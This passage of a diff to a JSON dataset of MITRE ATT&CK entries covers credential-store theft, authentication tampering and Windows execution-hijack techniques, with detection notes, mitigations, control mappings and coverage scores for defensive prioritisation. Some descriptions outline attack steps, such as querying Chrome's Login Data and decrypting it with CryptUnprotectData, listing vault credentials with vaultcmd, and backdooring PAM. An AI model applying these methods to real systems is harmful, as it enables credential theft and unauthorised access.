-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1555.001",
-                "name": "Credentials from Password Stores: Keychain",
-                "url": "https://attack.mitre.org/techniques/T1555/001",
-                "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.",
-                "detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
-                "mitigations": [
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1555.002",
-                "name": "Credentials from Password Stores: Securityd Memory",
-                "url": "https://attack.mitre.org/techniques/T1555/002",
-                "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)",
-                "detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
-                "mitigations": []
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "tid": "T1555.003",
-                "name": "Credentials from Password Stores: Credentials from Web Browsers",
-                "url": "https://attack.mitre.org/techniques/T1555/003",
-                "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
-                "detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).",
-                "mitigations": [
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
-            },
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.3476190476190476,
+        "adjusted_score": 0.3476190476190476,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "16.13",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1574.008",
+        "name": "Hijack Execution Flow: Path Interception by Search Order Hijacking",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
+        "url": "https://attack.mitre.org/techniques/T1574/008",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1555.004",
-                "name": "Credentials from Password Stores: Windows Credential Manager",
-                "url": "https://attack.mitre.org/techniques/T1555/004",
-                "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)",
-                "detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1555.005",
-                "name": "Credentials from Password Stores: Password Managers",
-                "url": "https://attack.mitre.org/techniques/T1555/005",
-                "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)",
-                "detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.",
-                "mitigations": [
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.5123808019047619,
-        "adjusted_score": 0.5123808019047619,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": false,
+        "cumulative_score": 0.35238095238095235,
+        "adjusted_score": 0.35238095238095235,
+        "has_car": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
         "cis_controls": [
-            "5.2"
+            "2.5",
+            "2.6",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "16.13",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
             "CA-7",
-            "IA-5",
-            "SI-4"
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.06190476190476191,
-            "mitigation_score": 0.07272727272727272,
-            "detection_score": 0.05
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.20047604
+        "hardware_coverage": false
     },
     {
-        "tid": "T1556",
-        "name": "Modify Authentication Process",
-        "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
-        "url": "https://attack.mitre.org/techniques/T1556",
+        "tid": "T1574.009",
+        "name": "Hijack Execution Flow: Path Interception by Unquoted Path",
+        "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
+        "url": "https://attack.mitre.org/techniques/T1574/009",
         "tactics": [
-            "Credential Access",
             "Defense Evasion",
-            "Persistence"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+        "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
         "platforms": [
-            "Linux",
-            "Network",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "File: File Creation",
             "File: File Modification",
-            "Logon Session: Logon Session Creation",
-            "Module: Module Load",
-            "Process: OS API Execution",
-            "Process: Process Access",
-            "Windows Registry: Windows Registry Key Modification"
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1556.001",
-                "name": "Modify Authentication Process: Domain Controller Authentication",
-                "url": "https://attack.mitre.org/techniques/T1556/001",
-                "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)",
-                "detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1025",
-                        "name": "Privileged Process Integrity",
-                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
-                        "url": "https://attack.mitre.org/mitigations/M1025"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1556.002",
-                "name": "Modify Authentication Process: Password Filter DLL",
-                "url": "https://attack.mitre.org/techniques/T1556/002",
-                "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)",
-                "detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)",
-                "mitigations": [
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1556.003",
-                "name": "Modify Authentication Process: Pluggable Authentication Modules",
-                "url": "https://attack.mitre.org/techniques/T1556/003",
-                "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
-                "detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "tid": "T1556.004",
-                "name": "Modify Authentication Process: Network Device Authentication",
-                "url": "https://attack.mitre.org/techniques/T1556/004",
-                "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)",
-                "detection": "Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nDetection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
+        "cumulative_score": 0.35238095238095235,
+        "adjusted_score": 0.35238095238095235,
+        "has_car": true,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "16.13",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1574.010",
+        "name": "Hijack Execution Flow: Services File Permissions Weakness",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
+        "url": "https://attack.mitre.org/techniques/T1574/010",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1025",
-                "name": "Privileged Process Integrity",
-                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
-                "url": "https://attack.mitre.org/mitigations/M1025"
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
             },
             {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.3952380952380953,
-        "adjusted_score": 0.3952380952380953,
-        "has_car": false,
-        "has_sigma": false,
+        "cumulative_score": 0.38095238095238093,
+        "adjusted_score": 0.38095238095238093,
+        "has_car": true,
